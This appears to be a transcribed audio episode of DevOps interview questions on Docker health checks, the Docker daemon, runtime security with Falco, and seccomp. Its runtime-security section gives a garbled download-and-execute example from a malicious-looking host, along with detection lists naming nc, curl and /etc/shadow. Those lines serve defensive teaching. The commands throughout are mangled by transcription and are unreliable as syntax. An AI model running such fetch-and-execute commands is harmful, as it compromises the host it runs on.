DevOps and CI-CD Part 19. This episode has 4 questions. For each question, take a moment to think through your own answer before I share a strong approach. Question 1. Explain health checks in Docker. Here's a strong way to approach it. What are health checks in Docker? Health checks are a mechanism used by Docker to determine whether a containerized application is healthy and functioning correctly. A container may be running, but the application inside it could be unresponsive. Health checks help detect such situations. Why are health checks needed? Without health checks, container status, running checkmark application, hung cross mark Docker only knows that the process exists. With health checks, container running health check healthy or unhealthy. Docker can determine the actual application state. Health check instruction Docker file, from ginks health check cmd curl fhttp, or localhost exit 1 Docker periodically executes, curl fhttp, or localhost if successful, healthy if it fails. Unhealthy health check state starting healthy unhealthy starting initial state healthy check passed unhealthy check failed repeatedly. Example health check, interval equals 30s, timeout equals 5s, retries equals 3 cmd curl fhttp, or localhost 8080 or health, exit 1 parameters, option description interval time between checks, timeout max check duration retries failures before unhealthy, start period startup grace period check health status Docker PS example, status up 10 minutes, healthy, detailed view, Docker inspect my container output, health status, healthy, example for API health check cmd curl fhttp, or localhost 8080 or actuator or health, exit 1 common for Spring Boot Node.js APIs Python Flask applications health check versus liveness probe Docker container. The exact commands and code are in the written question bank. Nice. Let's continue. Question 2. What is Docker daemon? Here's a strong way to approach it. What is Docker daemon? The Docker daemon, Dockered, is the background service that manages Docker objects such as containers, images, networks, volumes. It is the core component of the Docker engine and is responsible for building, running, and managing containers. Docker architecture plus Docker client, Docker CLI plus REST API plus Docker daemon, Dockered plus images, containers, networks. When you run a Docker command, the CLI communicates with the Docker daemon, which performs the actual work. Example command, Docker run ginks flow, Docker run ginks Docker CLI Docker daemon pull image. If needed, create container start container responsibilities of Docker daemon 1. Container management Docker run Docker stop Docker restart Docker RM creates, starts, stops, and removes containers 2. Image management Docker pull Docker build Docker push manages image lifecycle 3. Network management creates and manages, bridge networks host networks overlay networks 4. Volume management handles persistent storage, Docker volume create 5. API server The daemon exposes a REST API used by Docker CLI Docker Compose CI or CD tools third-party integrations Docker daemon process check status, systemtl status Docker or PSF grep Dockered example, or USR or bin or Dockered communication with Docker daemon default socket, or var or run or Docker sock Docker CLI communicates through this Unix socket, example, Docker PS Docker CLI or var or run or Docker sock Dockered security consideration access to, or var or run or Docker sock effectively grants Docker administrative privileges. This is why membership in the Docker group should be controlled carefully. Docker daemon and container runtime modern Docker architecture. Dockered containered runt container Docker management layer container lifecycle management runt creates and runs containers using Linux namespaces and grups restart Docker daemon Linux sudo systemtl restart Docker check Docker info interview answer 7+ years experience. The Docker daemon, Dockered, is the core background service of Docker engine responsible for managing containers, images, networks, and volumes. It exposes a REST API that the Docker CLI and other tools use to communicate with Docker. When a user executes commands such as Docker run or Docker build, the Docker daemon performs the actual operations, including image management, container lifecycle management, networking, and storage provisioning. Internally, modern Docker uses containered and runt beneath the daemon to create and manage containers. The daemon typically listens on or var or run or docker sock and requires careful access control because it effectively provides administrative access to the host system. Great. Moving on. Question 3. Explain runtime security. Here's a strong way to approach it. Runtime security is the practice of monitoring, detecting, and preventing security threats while an application, container, virtual machine, or Kubernetes workload is actively running in production. Unlike static security checks, code scanning, image scanning, IAC scanning, runtime security focuses on what is happening after deployment. Why runtime security is important. Even if source code is secure, container images are scanned, infrastructure is hardened, attackers may still exploit zero-day vulnerabilities, gain unauthorized access, execute malicious commands, escalate privileges, move laterally across systems. Runtime security helps detect and stop these activities in real time. Example: imagine a containerized application running in Kubernetes. Normal behavior: reads application files, connects to a database, writes logs. Suspicious behavior: widget maliciousite.com or malware sh chmod plus x malware sh or malware sh. A runtime security tool detects unexpected process execution, network connection to unknown hosts, file modifications, and immediately generates an alert, kills the process, isolates the container. Runtime security in Kubernetes. Common threats: 1. Privilege escalation. 2. Container escape attempts. 3. Reverse shells. 4. Cryptomining malware. 5. Unauthorized network access. 6. Suspicious process execution. 7. Sensitive file access. Key runtime security controls: 1. Process monitoring, track processes running inside containers. Example: bash shnc curl widget alert if unexpected processes start. 2. File integrity monitoring, monitor critical files, or etc. or password or etc. or shadow or etc. or ssh or detect unauthorized modifications. 3. Network monitoring, detect connections to malicious IPs, unusual outbound traffic, lateral movement. 4. Behavior anomaly detection, learn normal workload behavior and alert when new process appears, unexpected port opens, abnormal traffic occurs. 5. Threat detection, detect cryptominers, reverse shells, rootkits, known attack patterns. Popular runtime security tools. Tool purpose: Falco, Kubernetes runtime threat detection, Sysdig secure runtime security and compliance, Aqua security container and runtime protection, Prisma Cloud workload protection, CrowdStrike, Falcon endpoint and workload security, Microsoft Defender for cloud workload protection. Falco example: Falco watches Linux system calls. Rule terminal shell in container condition, container and shell procs output, shell spawned in container alert, shell spawned in container user equals root container equals payment service process equals bash. This indicates someone opened a shell inside a production container. Runtime security versus image scanning. Image scanning: runtime security before deployment. After deployment: finds CVEs, finds active attacks, static analysis, real-time monitoring, checks images, checks running workloads, preventive, detective and responsive. Interview answer. 2-minute version. Runtime security is the practice of monitoring and protecting applications, containers, VMs, and Kubernetes workloads while they are actively running in production. It focuses on detecting threats such as privilege escalation, unauthorized process execution, container escapes, reverse shells, and suspicious network activity. In Kubernetes environments, tools like Falco, Sysdig Secure, Aqua Security, and Prisma Cloud monitor system calls, file changes, and network behavior to identify attacks in real time. Runtime security complements image scanning and vulnerability management by protecting workloads after deployment and enabling rapid detection and response to security incidents. Alright, next question. Question 4. What is SecComp? Here's a strong way to approach it. What is SecComp? SecComp, Secure Computing Mode, is a Linux kernel security feature that restricts which system calls, syscalls, a process can make. It reduces the attack surface of applications by allowing only the syscalls that an application actually needs and blocking everything else. Why is SecComp needed? Every Linux process interacts with the kernel using system calls such as open, read, write, fork, exec, mount, socket. If an attacker compromises a container, they may try to use dangerous syscalls to spawn new processes, mount file systems, load kernel modules, escalate privileges. SecComp can block those syscalls. Example: suppose a web application only needs read, write, open, Close. If an attacker gains access and tries mount or dev or SDA1 or MNT the underlying mount, syscall can be blocked by seccomp. Result. Operation not permitted. How seccomp works. 1. A seccomp profile is applied to a process or container. 2. The profile defines allowed syscalls, denied syscalls. 3. The Linux kernel enforces these rules. Example. Default action. SEMPACTERRNO. Syscalls. The exact commands and code are in the written question bank. Let's keep going. That wraps up this episode. Nice work practicing, and see you in the next one.